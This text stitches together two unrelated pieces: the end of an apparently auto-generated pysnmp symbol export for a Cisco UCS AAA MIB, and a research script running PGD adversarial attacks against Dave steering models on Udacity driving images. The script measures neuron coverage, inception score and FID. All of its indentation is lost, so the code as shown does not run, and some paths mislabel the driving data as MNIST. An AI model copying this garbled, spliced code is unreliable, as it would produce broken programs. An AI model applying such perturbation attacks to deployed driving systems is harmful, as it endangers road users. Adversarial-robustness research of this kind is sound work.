cucsAaaLdapProviderBasedn=cucsAaaLdapProviderBasedn, cucsAaaOrgInstanceId=cucsAaaOrgInstanceId, cucsAaaTacacsPlusEpPolicyOwner=cucsAaaTacacsPlusEpPolicyOwner, cucsAaaUserEpFsmStageEntry=cucsAaaUserEpFsmStageEntry, cucsAaaAuthRealmFsmTry=cucsAaaAuthRealmFsmTry, cucsAaaEpFsmTaskRn=cucsAaaEpFsmTaskRn, cucsAaaCimcSessionId=cucsAaaCimcSessionId, cucsAaaUserEpFsmDn=cucsAaaUserEpFsmDn, 
cucsAaaDomainTable=cucsAaaDomainTable, cucsAaaUserEpFsmCurrentFsm=cucsAaaUserEpFsmCurrentFsm, cucsAaaTacacsPlusEpFsmStageRetry=cucsAaaTacacsPlusEpFsmStageRetry, cucsAaaOrgConfigStatusMessage=cucsAaaOrgConfigStatusMessage, cucsAaaUserInstanceId=cucsAaaUserInstanceId, cucsAaaWebLoginName=cucsAaaWebLoginName, cucsAaaEpLoginRn=cucsAaaEpLoginRn, cucsAaaPreLoginBannerDn=cucsAaaPreLoginBannerDn, cucsAaaRealmFsmTaskFlags=cucsAaaRealmFsmTaskFlags, cucsAaaEpUserRn=cucsAaaEpUserRn, cucsAaaSessionEntry=cucsAaaSessionEntry, cucsAaaUserPriv=cucsAaaUserPriv, cucsAaaSessionInfoUser=cucsAaaSessionInfoUser, cucsAaaEpLoginSession=cucsAaaEpLoginSession, cucsAaaTacacsPlusProviderRn=cucsAaaTacacsPlusProviderRn, cucsAaaPreLoginBannerName=cucsAaaPreLoginBannerName, cucsAaaLdapEpFsmRmtInvErrCode=cucsAaaLdapEpFsmRmtInvErrCode, cucsAaaUserRoleEntry=cucsAaaUserRoleEntry, cucsAaaExtMgmtCutThruTknType=cucsAaaExtMgmtCutThruTknType, cucsAaaModLRInd=cucsAaaModLRInd, cucsAaaTacacsPlusEpFsmRn=cucsAaaTacacsPlusEpFsmRn, cucsAaaAuthRealmConLogin=cucsAaaAuthRealmConLogin, cucsAaaLocaleConfigStatusMessage=cucsAaaLocaleConfigStatusMessage, cucsAaaDefaultAuthInstanceId=cucsAaaDefaultAuthInstanceId, cucsAaaRadiusProviderRetries=cucsAaaRadiusProviderRetries, cucsAaaUserLocaleInstanceId=cucsAaaUserLocaleInstanceId, cucsAaaUserLocaleConfigStatusMessage=cucsAaaUserLocaleConfigStatusMessage, cucsAaaRealmFsmStageLastUpdateTime=cucsAaaRealmFsmStageLastUpdateTime, cucsAaaPreLoginBannerTable=cucsAaaPreLoginBannerTable, cucsAaaUserEpFsmRmtRslt=cucsAaaUserEpFsmRmtRslt, cucsAaaAuthRealmFsmTable=cucsAaaAuthRealmFsmTable, cucsAaaLdapEpFsmStageEntry=cucsAaaLdapEpFsmStageEntry, cucsAaaLdapGroupRuleDescr=cucsAaaLdapGroupRuleDescr, cucsAaaProviderGroupEntry=cucsAaaProviderGroupEntry, cucsAaaUserEpFsmPrev=cucsAaaUserEpFsmPrev, cucsAaaExtMgmtCutThruTknCreationTime=cucsAaaExtMgmtCutThruTknCreationTime, cucsAaaRadiusEpFsmStageTable=cucsAaaRadiusEpFsmStageTable, cucsAaaSessionTerm=cucsAaaSessionTerm, cucsAaaTacacsPlusEpFsmStageDescrData=cucsAaaTacacsPlusEpFsmStageDescrData, cucsAaaLdapEpPolicyOwner=cucsAaaLdapEpPolicyOwner, cucsAaaRealmFsmTaskSeqId=cucsAaaRealmFsmTaskSeqId, cucsAaaAuthRealmFsmProgr=cucsAaaAuthRealmFsmProgr, cucsAaaLdapEpAttribute=cucsAaaLdapEpAttribute, cucsAaaAuthRealmDefRolePolicy=cucsAaaAuthRealmDefRolePolicy, cucsAaaShellLoginEntry=cucsAaaShellLoginEntry, cucsAaaTacacsPlusEpFsmRmtInvErrCode=cucsAaaTacacsPlusEpFsmRmtInvErrCode, cucsAaaEpLoginInstanceId=cucsAaaEpLoginInstanceId)
mibBuilder.exportSymbols("CISCO-UNIFIED-COMPUTING-AAA-MIB", cucsAaaSshAuthEntry=cucsAaaSshAuthEntry, cucsAaaAuthRealmFsmStageEntry=cucsAaaAuthRealmFsmStageEntry, cucsAaaRadiusEpFsmTable=cucsAaaRadiusEpFsmTable, cucsAaaShellLoginDescr=cucsAaaShellLoginDescr, cucsAaaExtMgmtCutThruTknUser=cucsAaaExtMgmtCutThruTknUser, cucsAaaEpFsmTaskEntry=cucsAaaEpFsmTaskEntry, cucsAaaModLRTable=cucsAaaModLRTable, cucsAaaProviderGroupInstanceId=cucsAaaProviderGroupInstanceId, cucsAaaUserConfigState=cucsAaaUserConfigState, cucsAaaConsoleAuthRealm=cucsAaaConsoleAuthRealm, cucsAaaRadiusEpRetries=cucsAaaRadiusEpRetries, cucsAaaEpLoginName=cucsAaaEpLoginName, cucsAaaSessionInfoTableTable=cucsAaaSessionInfoTableTable, cucsAaaTacacsPlusEpFsmStamp=cucsAaaTacacsPlusEpFsmStamp, cucsAaaDefaultAuthConfigState=cucsAaaDefaultAuthConfigState, cucsAaaExtMgmtCutThruTknPolicyLevel=cucsAaaExtMgmtCutThruTknPolicyLevel, cucsAaaEpFsmEntry=cucsAaaEpFsmEntry, cucsAaaRealmFsmFsmStatus=cucsAaaRealmFsmFsmStatus, cucsAaaLdapProviderTable=cucsAaaLdapProviderTable, cucsAaaCimcSessionType=cucsAaaCimcSessionType, cucsAaaExtMgmtCutThruTknToken=cucsAaaExtMgmtCutThruTknToken, cucsAaaTacacsPlusEpPolicyLevel=cucsAaaTacacsPlusEpPolicyLevel, cucsAaaEpUserName=cucsAaaEpUserName, cucsAaaLdapEpRetries=cucsAaaLdapEpRetries, cucsAaaAuthRealmFsmRmtRslt=cucsAaaAuthRealmFsmRmtRslt, cucsAaaLogEntry=cucsAaaLogEntry, cucsAaaCimcSessionCimcAddr=cucsAaaCimcSessionCimcAddr, cucsAaaSshAuthTable=cucsAaaSshAuthTable, cucsAaaEpFsmDescr=cucsAaaEpFsmDescr, cucsAaaUserEpEntry=cucsAaaUserEpEntry, cucsAaaPwdProfileMinPassphraseLen=cucsAaaPwdProfileMinPassphraseLen, cucsAaaSessionLRDn=cucsAaaSessionLRDn, cucsAaaTacacsPlusEpFsmStageDn=cucsAaaTacacsPlusEpFsmStageDn, cucsAaaUserEpFsmTaskDn=cucsAaaUserEpFsmTaskDn, cucsAaaAuthRealmFsmInstanceId=cucsAaaAuthRealmFsmInstanceId, cucsAaaRealmFsmRmtRslt=cucsAaaRealmFsmRmtRslt, cucsAaaUserDataPwdChangedDate=cucsAaaUserDataPwdChangedDate, cucsAaaEpFsmRmtErrDescr=cucsAaaEpFsmRmtErrDescr, cucsAaaLocaleRn=cucsAaaLocaleRn, cucsAaaTacacsPlusEpFsmDescrData=cucsAaaTacacsPlusEpFsmDescrData, cucsAaaShellLoginName=cucsAaaShellLoginName, cucsAaaRadiusEpFsmDescr=cucsAaaRadiusEpFsmDescr, cucsAaaUserDataRn=cucsAaaUserDataRn, cucsAaaProviderGroupSize=cucsAaaProviderGroupSize, cucsAaaUserEpDescr=cucsAaaUserEpDescr, cucsAaaCimcSessionIntDel=cucsAaaCimcSessionIntDel, cucsAaaSessionLRTxId=cucsAaaSessionLRTxId, cucsAaaUserConfigStatusMessage=cucsAaaUserConfigStatusMessage, cucsAaaRadiusEpFsmStageRetry=cucsAaaRadiusEpFsmStageRetry, cucsAaaConsoleAuthProviderGroup=cucsAaaConsoleAuthProviderGroup, cucsAaaDomainAuthOperProviderGroup=cucsAaaDomainAuthOperProviderGroup, cucsAaaRealmFsmTaskItem=cucsAaaRealmFsmTaskItem, cucsAaaCimcSessionPid=cucsAaaCimcSessionPid, cucsAaaRealmFsmDescr=cucsAaaRealmFsmDescr, cucsAaaUserDataPwdHistory=cucsAaaUserDataPwdHistory, cucsAaaDefaultAuthConfigStatusMessage=cucsAaaDefaultAuthConfigStatusMessage, cucsAaaShellLoginInstanceId=cucsAaaShellLoginInstanceId, cucsAaaTacacsPlusProviderTable=cucsAaaTacacsPlusProviderTable, cucsAaaUserEpFsmStageDescrData=cucsAaaUserEpFsmStageDescrData, cucsAaaSessionSwitchId=cucsAaaSessionSwitchId, cucsAaaSessionInfoEtime=cucsAaaSessionInfoEtime, cucsAaaProviderRefDescr=cucsAaaProviderRefDescr, cucsAaaOrgConfigState=cucsAaaOrgConfigState, cucsAaaRealmFsmTaskTable=cucsAaaRealmFsmTaskTable, cucsAaaTacacsPlusProviderKeySet=cucsAaaTacacsPlusProviderKeySet, cucsAaaRadiusEpFsmRmtErrDescr=cucsAaaRadiusEpFsmRmtErrDescr, cucsAaaAuthRealmFsmDescrData=cucsAaaAuthRealmFsmDescrData, 
cucsAaaExtMgmtCutThruTknRn=cucsAaaExtMgmtCutThruTknRn, cucsAaaRealmFsmStageDn=cucsAaaRealmFsmStageDn, cucsAaaSessionTable=cucsAaaSessionTable, cucsAaaEpLoginEntry=cucsAaaEpLoginEntry, cucsAaaRadiusEpPolicyLevel=cucsAaaRadiusEpPolicyLevel, cucsAaaShellLoginIntId=cucsAaaShellLoginIntId, cucsAaaTacacsPlusEpDescr=cucsAaaTacacsPlusEpDescr, cucsAaaUserEpFsmTaskItem=cucsAaaUserEpFsmTaskItem, cucsAaaEpFsmTaskCompletion=cucsAaaEpFsmTaskCompletion, cucsAaaLdapEpFsmStageTable=cucsAaaLdapEpFsmStageTable, cucsAaaRoleEntry=cucsAaaRoleEntry, cucsAaaUserDataPolicyOwner=cucsAaaUserDataPolicyOwner, cucsAaaLdapProviderDn=cucsAaaLdapProviderDn, cucsAaaLdapEpFsmRmtInvRslt=cucsAaaLdapEpFsmRmtInvRslt, cucsAaaSessionLRRn=cucsAaaSessionLRRn, cucsAaaUserEpDn=cucsAaaUserEpDn, cucsAaaLocaleIntId=cucsAaaLocaleIntId, cucsAaaProviderGroupName=cucsAaaProviderGroupName, cucsAaaRemoteUserPwd=cucsAaaRemoteUserPwd, cucsAaaUserEpFsmStageLastUpdateTime=cucsAaaUserEpFsmStageLastUpdateTime, cucsAaaTacacsPlusEpFsmTable=cucsAaaTacacsPlusEpFsmTable, cucsAaaLocaleEntry=cucsAaaLocaleEntry, cucsAaaTacacsPlusEpFsmStageInstanceId=cucsAaaTacacsPlusEpFsmStageInstanceId, cucsAaaLdapGroupRuleDn=cucsAaaLdapGroupRuleDn, cucsAaaUserClearPwdHistory=cucsAaaUserClearPwdHistory, cucsAaaAuthRealmFsmStageDn=cucsAaaAuthRealmFsmStageDn, cucsAaaLdapEpFsmStageLastUpdateTime=cucsAaaLdapEpFsmStageLastUpdateTime, cucsAaaSessionUi=cucsAaaSessionUi, cucsAaaDefaultAuthRn=cucsAaaDefaultAuthRn, cucsAaaUserEpInstanceId=cucsAaaUserEpInstanceId, cucsAaaWebLoginDn=cucsAaaWebLoginDn, cucsAaaSessionPid=cucsAaaSessionPid, cucsAaaSessionLRInd=cucsAaaSessionLRInd, cucsAaaLdapEpTimeout=cucsAaaLdapEpTimeout, cucsAaaLogTable=cucsAaaLogTable, cucsAaaUserEpFsmDescr=cucsAaaUserEpFsmDescr, cucsAaaRadiusProviderEntry=cucsAaaRadiusProviderEntry, cucsAaaAuthRealmFsmStageRn=cucsAaaAuthRealmFsmStageRn, cucsAaaLdapEpDescr=cucsAaaLdapEpDescr, cucsAaaLdapProviderFilter=cucsAaaLdapProviderFilter, cucsAaaSessionInfoPriv=cucsAaaSessionInfoPriv, cucsAaaEpUserDescr=cucsAaaEpUserDescr, cucsAaaWebLoginTable=cucsAaaWebLoginTable, cucsAaaSessionLRCreated=cucsAaaSessionLRCreated, cucsAaaSessionInfoType=cucsAaaSessionInfoType, cucsAaaAuthRealmEntry=cucsAaaAuthRealmEntry, cucsAaaLdapEpFsmStatus=cucsAaaLdapEpFsmStatus, cucsAaaUserEpFsmTaskEntry=cucsAaaUserEpFsmTaskEntry, cucsAaaRemoteUserInstanceId=cucsAaaRemoteUserInstanceId, cucsAaaRolePolicyOwner=cucsAaaRolePolicyOwner, cucsAaaDefaultAuthProviderGroup=cucsAaaDefaultAuthProviderGroup, cucsAaaUserAccountStatus=cucsAaaUserAccountStatus, cucsAaaSessionInfoTable=cucsAaaSessionInfoTable, cucsAaaRadiusProviderRn=cucsAaaRadiusProviderRn, cucsAaaEpLoginDescr=cucsAaaEpLoginDescr, cucsAaaTacacsPlusEpName=cucsAaaTacacsPlusEpName, cucsAaaUserPwdSet=cucsAaaUserPwdSet, cucsAaaRadiusProviderKey=cucsAaaRadiusProviderKey, cucsAaaDefaultAuthName=cucsAaaDefaultAuthName, cucsAaaUserEpRn=cucsAaaUserEpRn, cucsAaaProviderRefRn=cucsAaaProviderRefRn, cucsAaaUserEpFsmRn=cucsAaaUserEpFsmRn, cucsAaaSessionInfoTableEntry=cucsAaaSessionInfoTableEntry, cucsAaaLdapEpFsmRmtInvErrDescr=cucsAaaLdapEpFsmRmtInvErrDescr, cucsAaaUserEpFsmStageName=cucsAaaUserEpFsmStageName, cucsAaaTacacsPlusEpFsmRmtErrDescr=cucsAaaTacacsPlusEpFsmRmtErrDescr, cucsAaaAuthRealmFsmRmtInvRslt=cucsAaaAuthRealmFsmRmtInvRslt, cucsAaaRadiusEpFsmStageName=cucsAaaRadiusEpFsmStageName, cucsAaaUserEpName=cucsAaaUserEpName, cucsAaaEpUserEntry=cucsAaaEpUserEntry, cucsAaaShellLoginLocalHost=cucsAaaShellLoginLocalHost, cucsAaaRadiusEpFsmRmtInvRslt=cucsAaaRadiusEpFsmRmtInvRslt, 
cucsAaaRadiusEpFsmDn=cucsAaaRadiusEpFsmDn, cucsAaaObjects=cucsAaaObjects, cucsAaaRadiusEpFsmRmtInvErrCode=cucsAaaRadiusEpFsmRmtInvErrCode, cucsAaaSessionInfoUserType=cucsAaaSessionInfoUserType, cucsAaaRadiusEpFsmRmtRslt=cucsAaaRadiusEpFsmRmtRslt, cucsAaaUserEpFsmDescrData=cucsAaaUserEpFsmDescrData, cucsAaaLdapEpEntry=cucsAaaLdapEpEntry, cucsAaaAuthRealmFsmStageRetry=cucsAaaAuthRealmFsmStageRetry, cucsAaaRemoteUserConfigStatusMessage=cucsAaaRemoteUserConfigStatusMessage, cucsAaaCimcSessionSourceAddr=cucsAaaCimcSessionSourceAddr, cucsAaaPreLoginBannerMessage=cucsAaaPreLoginBannerMessage, cucsAaaTacacsPlusEpEntry=cucsAaaTacacsPlusEpEntry, cucsAaaLdapProviderKeySet=cucsAaaLdapProviderKeySet, cucsAaaCimcSessionDn=cucsAaaCimcSessionDn, cucsAaaUserLocaleConfigState=cucsAaaUserLocaleConfigState, cucsAaaRadiusEpFsmProgr=cucsAaaRadiusEpFsmProgr, cucsAaaUserEpFsmTaskFlags=cucsAaaUserEpFsmTaskFlags, cucsAaaSshAuthInstanceId=cucsAaaSshAuthInstanceId, cucsAaaPreLoginBannerInstanceId=cucsAaaPreLoginBannerInstanceId, cucsAaaEpFsmTaskSeqId=cucsAaaEpFsmTaskSeqId, cucsAaaModLRInstanceId=cucsAaaModLRInstanceId, cucsAaaAuthRealmFsmRmtErrDescr=cucsAaaAuthRealmFsmRmtErrDescr, cucsAaaWebLoginIntId=cucsAaaWebLoginIntId, cucsAaaRemoteUserTable=cucsAaaRemoteUserTable, cucsAaaLdapProviderOrder=cucsAaaLdapProviderOrder, cucsAaaLdapGroupRn=cucsAaaLdapGroupRn, cucsAaaDefaultAuthDescr=cucsAaaDefaultAuthDescr, cucsAaaEpUserConfigState=cucsAaaEpUserConfigState, cucsAaaLdapEpFsmEntry=cucsAaaLdapEpFsmEntry, cucsAaaTacacsPlusProviderKey=cucsAaaTacacsPlusProviderKey, cucsAaaRealmFsmStageTable=cucsAaaRealmFsmStageTable, cucsAaaSessionInfoInstanceId=cucsAaaSessionInfoInstanceId, cucsAaaUserDataPwdChangeCount=cucsAaaUserDataPwdChangeCount, cucsAaaLdapGroupDescr=cucsAaaLdapGroupDescr, cucsAaaOrgName=cucsAaaOrgName, cucsAaaPwdProfileExpirationWarnTime=cucsAaaPwdProfileExpirationWarnTime, cucsAaaProviderRefInstanceId=cucsAaaProviderRefInstanceId, cucsAaaRadiusEpFsmPrev=cucsAaaRadiusEpFsmPrev, cucsAaaCimcSessionLsDn=cucsAaaCimcSessionLsDn, cucsAaaEpAuthProfileRn=cucsAaaEpAuthProfileRn, cucsAaaAuthRealmFsmStageName=cucsAaaAuthRealmFsmStageName, cucsAaaSshAuthDn=cucsAaaSshAuthDn, cucsAaaUserRoleDescr=cucsAaaUserRoleDescr, cucsAaaDomainAuthEntry=cucsAaaDomainAuthEntry, cucsAaaLdapGroupRuleInstanceId=cucsAaaLdapGroupRuleInstanceId, cucsAaaSessionInfoAddress=cucsAaaSessionInfoAddress, cucsAaaWebLoginRemoteHost=cucsAaaWebLoginRemoteHost, cucsAaaProviderGroupDescr=cucsAaaProviderGroupDescr, cucsAaaUserEpFsmStatus=cucsAaaUserEpFsmStatus, cucsAaaEpFsmTaskItem=cucsAaaEpFsmTaskItem, cucsAaaRadiusEpFsmRn=cucsAaaRadiusEpFsmRn, cucsAaaAuthRealmFsmStageOrder=cucsAaaAuthRealmFsmStageOrder, cucsAaaAuthRealmFsmStageTable=cucsAaaAuthRealmFsmStageTable, cucsAaaTacacsPlusEpFsmProgr=cucsAaaTacacsPlusEpFsmProgr, cucsAaaLdapEpFsmRn=cucsAaaLdapEpFsmRn, cucsAaaProviderGroupRn=cucsAaaProviderGroupRn, cucsAaaRadiusEpEntry=cucsAaaRadiusEpEntry, cucsAaaSessionLRTrig=cucsAaaSessionLRTrig, cucsAaaUserRoleInstanceId=cucsAaaUserRoleInstanceId, cucsAaaDefaultAuthRealm=cucsAaaDefaultAuthRealm, cucsAaaAuthRealmInstanceId=cucsAaaAuthRealmInstanceId, cucsAaaPwdProfileTable=cucsAaaPwdProfileTable, cucsAaaRealmFsmStageInstanceId=cucsAaaRealmFsmStageInstanceId, cucsAaaUserEncPwdSet=cucsAaaUserEncPwdSet, cucsAaaEpLoginDn=cucsAaaEpLoginDn, cucsAaaTacacsPlusEpFsmStageStageStatus=cucsAaaTacacsPlusEpFsmStageStageStatus, cucsAaaRemoteUserEntry=cucsAaaRemoteUserEntry, cucsAaaRealmFsmTable=cucsAaaRealmFsmTable, cucsAaaSshAuthRn=cucsAaaSshAuthRn, 
cucsAaaLdapProviderPort=cucsAaaLdapProviderPort, cucsAaaLdapEpPolicyLevel=cucsAaaLdapEpPolicyLevel, cucsAaaEpUserPriv=cucsAaaEpUserPriv, cucsAaaRadiusEpPolicyOwner=cucsAaaRadiusEpPolicyOwner, cucsAaaRadiusEpFsmFsmStatus=cucsAaaRadiusEpFsmFsmStatus, cucsAaaRealmFsmRn=cucsAaaRealmFsmRn, cucsAaaShellLoginPolicyOwner=cucsAaaShellLoginPolicyOwner, cucsAaaUserLocaleName=cucsAaaUserLocaleName, cucsAaaAuthRealmDefLogin=cucsAaaAuthRealmDefLogin, cucsAaaCimcSessionRn=cucsAaaCimcSessionRn, cucsAaaEpFsmCurrentFsm=cucsAaaEpFsmCurrentFsm, cucsAaaRoleIntId=cucsAaaRoleIntId, cucsAaaRoleRn=cucsAaaRoleRn, cucsAaaExtMgmtCutThruTknDn=cucsAaaExtMgmtCutThruTknDn, cucsAaaUserEpIntId=cucsAaaUserEpIntId, cucsAaaSessionInstanceId=cucsAaaSessionInstanceId, cucsAaaPreLoginBannerPolicyOwner=cucsAaaPreLoginBannerPolicyOwner, cucsAaaEpAuthProfileDescr=cucsAaaEpAuthProfileDescr, cucsAaaUserEpFsmTaskSeqId=cucsAaaUserEpFsmTaskSeqId, cucsAaaWebLoginPolicyLevel=cucsAaaWebLoginPolicyLevel, cucsAaaShellLoginDn=cucsAaaShellLoginDn, cucsAaaRealmFsmStageDescr=cucsAaaRealmFsmStageDescr, cucsAaaAuthRealmFsmStageStageStatus=cucsAaaAuthRealmFsmStageStageStatus, cucsAaaSessionSessionTimeout=cucsAaaSessionSessionTimeout, cucsAaaTacacsPlusEpFsmStatus=cucsAaaTacacsPlusEpFsmStatus, cucsAaaRoleInstanceId=cucsAaaRoleInstanceId, cucsAaaLdapEpRn=cucsAaaLdapEpRn, cucsAaaOrgDn=cucsAaaOrgDn, cucsAaaUserRoleConfigState=cucsAaaUserRoleConfigState, cucsAaaPwdProfileEntry=cucsAaaPwdProfileEntry, cucsAaaAuthRealmFsmRn=cucsAaaAuthRealmFsmRn, cucsAaaUserPwd=cucsAaaUserPwd, cucsAaaEpFsmTaskFlags=cucsAaaEpFsmTaskFlags, cucsAaaRealmFsmStageEntry=cucsAaaRealmFsmStageEntry, cucsAaaEpFsmStageOrder=cucsAaaEpFsmStageOrder, cucsAaaDomainAuthUse2Factor=cucsAaaDomainAuthUse2Factor, cucsAaaRealmFsmTaskDn=cucsAaaRealmFsmTaskDn, cucsAaaUserLocaleDescr=cucsAaaUserLocaleDescr, cucsAaaEpAuthProfileDn=cucsAaaEpAuthProfileDn, cucsAaaUserEpFsmTry=cucsAaaUserEpFsmTry, cucsAaaRadiusEpFsmRmtInvErrDescr=cucsAaaRadiusEpFsmRmtInvErrDescr, cucsAaaLdapEpFsmStageRn=cucsAaaLdapEpFsmStageRn, cucsAaaRealmFsmCurrentFsm=cucsAaaRealmFsmCurrentFsm, cucsAaaLogPurgeWindow=cucsAaaLogPurgeWindow, cucsAaaUserRn=cucsAaaUserRn, cucsAaaUserEpFsmRmtInvErrCode=cucsAaaUserEpFsmRmtInvErrCode)
mibBuilder.exportSymbols("CISCO-UNIFIED-COMPUTING-AAA-MIB", cucsAaaExtMgmtCutThruTknPolicyOwner=cucsAaaExtMgmtCutThruTknPolicyOwner, cucsAaaRealmFsmStageOrder=cucsAaaRealmFsmStageOrder, cucsAaaRadiusEpFsmCurrentFsm=cucsAaaRadiusEpFsmCurrentFsm, cucsAaaTacacsPlusEpFsmCurrentFsm=cucsAaaTacacsPlusEpFsmCurrentFsm, cucsAaaUserEpFsmStageDescr=cucsAaaUserEpFsmStageDescr, cucsAaaUserDataDescr=cucsAaaUserDataDescr)
|
# PGD + Diversity Regularization on the Udacity self-driving car dataset
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from torchvision.datasets import DatasetFolder, ImageFolder
from torch.utils.data import DataLoader  # used to build test_loader below
import numpy as np
import matplotlib.pyplot as plt
import traceback
import warnings
warnings.filterwarnings('ignore')
import datetime
import glob
import os
import pickle
import pandas as pd
from models import *
from div_attacks import *
from neuron_coverage import *
from inception_score import *
from fid_score import *
from utils import *
# check if CUDA is available
device = torch.device("cpu")
use_cuda = False
if torch.cuda.is_available():
print('CUDA is available!')
device = torch.device("cuda")
use_cuda = True
else:
print('CUDA is not available.')
random_seed = 1
torch.manual_seed(random_seed)
date = datetime.date.today()
data_dir = 'data/udacity_self_driving_car'
targets_file = 'targets.csv'
batch_size = 32
dataset = car_loader(target_csv_file=os.path.join(data_dir, targets_file),
img_dir=os.path.join(data_dir, 'data'),
device=device,
num_classes=25,
transform=transforms.Compose([transforms.ToTensor(),
transforms.ToPILImage(),
transforms.Resize((100,100)),
transforms.ToTensor()]))
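# The transform chain converts each sample to a tensor, back to a PIL image, resizes it
# to 100x100, and converts to a tensor again -- presumably because this torchvision
# version's Resize expects PIL images while the raw samples arrive as arrays
# (exact behaviour depends on car_loader from utils).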
test_loader = DataLoader(dataset, batch_size=batch_size)
# Generate a custom batch to ensure that each "class" of steering angles is equally represented
num_per_class = 4
class_distribution = torch.ones(dataset.num_classes) * num_per_class
inputs, targets, classes = generate_batch_reg(dataset, class_distribution, device)
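# With num_classes = 25 and num_per_class = 4, the balanced batch above should hold
# 100 samples, an equal share per discretized steering-angle "class" (the exact
# behaviour depends on generate_batch_reg from utils).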
# # Load Pretrained Models if available
## Dave_orig
dave_o = Dave_orig().to(device)
dave_o = get_pretrained_weights(dave_o, device, 'pretrained_models/driving/')
## Dave_norminit
dave_n = Dave_norminit().to(device)
dave_n = get_pretrained_weights(dave_n, device, 'pretrained_models/driving/')
# # Attack Time
def main():
models = [dave_o, dave_n]
# attack params
epsilon = 100.
num_steps = 20
step_size = 0.01
log_frequency = 100
# primary evaluation criteria
attack_versions = [pgd_attack_reg]
reg_weights = [0, 1, 10, 100, 1000, 10000, 100000, 1000000]
epsilons = [0.1, 0.2, 0.3]
# neuron coverage params
nc_threshold = 0. # all activations are scaled to (0,1) after relu
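# Rough sketch of the coverage metric that eval_nc (from neuron_coverage.py) is assumed
# to compute: a neuron counts as "covered" if its scaled activation exceeds the threshold
# for at least one input, and coverage is the covered fraction. Illustrative only; the
# names below are hypothetical, not the actual implementation:
#     acts = get_scaled_activations(model, inputs)            # dict: neuron -> activations in (0, 1)
#     covered = sum(int((a > threshold).any()) for a in acts.values())
#     coverage = covered / len(acts)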
# inception score (is) params
is_cuda = use_cuda
is_batch_size = 10
is_resize = True
is_splits = 10
# frechet inception distance score (fid) params
real_path = "temp_imgs/mnist/real_pgd_driving/"
fake_path = "temp_imgs/mnist/fake_pgd_driving/"
fid_batch_size = 64
fid_cuda = use_cuda
with open('logs/pgd_mnist_error_log_' + str(date) + '.txt', 'w') as error_log:
for model in models:
results = []
model_name = model.__class__.__name__
save_file_path = 'assets/pgd_results_driving_' + model_name + '_' + str(date) + '.pkl'
# neuron coverage
covered_neurons, total_neurons, neuron_coverage_000 = eval_nc(model, inputs, 0.00)
print('neuron_coverage_000:', neuron_coverage_000)
covered_neurons, total_neurons, neuron_coverage_020 = eval_nc(model, inputs, 0.20)
print('neuron_coverage_020:', neuron_coverage_020)
covered_neurons, total_neurons, neuron_coverage_050 = eval_nc(model, inputs, 0.50)
print('neuron_coverage_050:', neuron_coverage_050)
covered_neurons, total_neurons, neuron_coverage_075 = eval_nc(model, inputs, 0.75)
print('neuron_coverage_075:', neuron_coverage_075)
init = {'desc': 'Initial inputs, targets, classes',
'inputs': inputs,
'targets': targets,
'classes': classes,
'neuron_coverage_000': neuron_coverage_000,
'neuron_coverage_020': neuron_coverage_020,
'neuron_coverage_050': neuron_coverage_050,
'neuron_coverage_075': neuron_coverage_075}
results.append(init)
n=2 # skip relu layers
layer_dict = get_model_modules(model)
target_layers = list(layer_dict)[0::n]
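# With n = 2 this keeps every other registered module, e.g. an ordering like
# [conv1, relu1, conv2, relu2, ...] reduces to [conv1, conv2, ...], so the diversity
# regularizer is only attached to non-ReLU layers.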
for attack in attack_versions:
for layer_idx in target_layers:
module = layer_dict[layer_idx]
for rw in reg_weights:
for e in epsilons:
try:
timestamp = str(datetime.datetime.now()).replace(':','.')
attack_detail = ['model', model_name,
'timestamp', timestamp,
'attack', attack.__name__,
'layer', layer_idx,
'regularization_weight', rw,
'epsilon', e]
print(*attack_detail, sep=' ')
# adversarial attack
orig_err, pgd_err, adversaries = attack(model,
module,
rw,
inputs,
targets,
device,
epsilon=e,
num_steps=num_steps,
step_size=step_size,
log_frequency=log_frequency)
# evaluate adversary effectiveness
mse, pert_acc, orig_acc = eval_performance_reg(model, inputs, adversaries, targets, classes, dataset)
# sample_3D_images_reg(model, inputs, adversaries, targets, classes, dataset)
pert_acc = pert_acc.item() / 100.
orig_acc = orig_acc.item() / 100.
attack_success_rate = 1 - pert_acc
# neuron coverage
covered_neurons, total_neurons, neuron_coverage_000 = eval_nc(model, adversaries, 0.00)
print('neuron_coverage_000:', neuron_coverage_000)
covered_neurons, total_neurons, neuron_coverage_020 = eval_nc(model, adversaries, 0.20)
print('neuron_coverage_020:', neuron_coverage_020)
covered_neurons, total_neurons, neuron_coverage_050 = eval_nc(model, adversaries, 0.50)
print('neuron_coverage_050:', neuron_coverage_050)
covered_neurons, total_neurons, neuron_coverage_075 = eval_nc(model, adversaries, 0.75)
print('neuron_coverage_075:', neuron_coverage_075)
# inception score
preprocessed_advs = preprocess_3D_imgs(adversaries)
mean_is, std_is = inception_score(preprocessed_advs, is_cuda, is_batch_size, is_resize, is_splits)
print('inception_score:', mean_is)
# fid score
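# dims selects which InceptionV3 feature layer the FID is computed over; assuming
# calculate_fid_given_paths follows the pytorch-fid interface, 64 corresponds to the
# first max-pool features and 2048 to the final average-pooled features.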
paths = [real_path, fake_path]
# dimensionality = 64
target_num = 64
generate_imgs(inputs, real_path, target_num)
generate_imgs(adversaries, fake_path, target_num)
fid_score_64 = calculate_fid_given_paths(paths, fid_batch_size, fid_cuda, dims=64)
print('fid_score_64:', fid_score_64)
# dimensionality = 2048
target_num = 2048
generate_imgs(inputs, real_path, target_num)
generate_imgs(adversaries, fake_path, target_num)
fid_score_2048 = calculate_fid_given_paths(paths, fid_batch_size, fid_cuda, dims=2048)
print('fid_score_2048:', fid_score_2048)
# output impartiality
pert_output = model(adversaries)
y_pred = discretize(pert_output, dataset.boundaries).view(-1)
output_impartiality, y_pred_entropy, max_entropy = calculate_output_impartiality(classes, y_pred)
print('output_impartiality:', output_impartiality)
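# output_impartiality is taken here as a measure of how evenly the adversarial
# predictions spread over the steering-angle classes, presumably the entropy of
# y_pred relative to max_entropy (see the imported calculate_output_impartiality helper).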
out = {'timestamp': timestamp,
'attack': attack.__name__,
'model': model_name,
'layer': layer_idx,
'regularization_weight': rw,
'epsilon': e,
'adversaries': adversaries,
'pert_acc':pert_acc,
'orig_acc': orig_acc,
'attack_success_rate': attack_success_rate,
'neuron_coverage_000': neuron_coverage_000,
'neuron_coverage_020': neuron_coverage_020,
'neuron_coverage_050': neuron_coverage_050,
'neuron_coverage_075': neuron_coverage_075,
'inception_score': mean_is,
'fid_score_64': fid_score_64,
'fid_score_2048': fid_score_2048,
'output_impartiality': output_impartiality}
results.append(out)
# save incremental outputs
with open(save_file_path, 'wb') as handle:
pickle.dump(results, handle, protocol=pickle.HIGHEST_PROTOCOL)
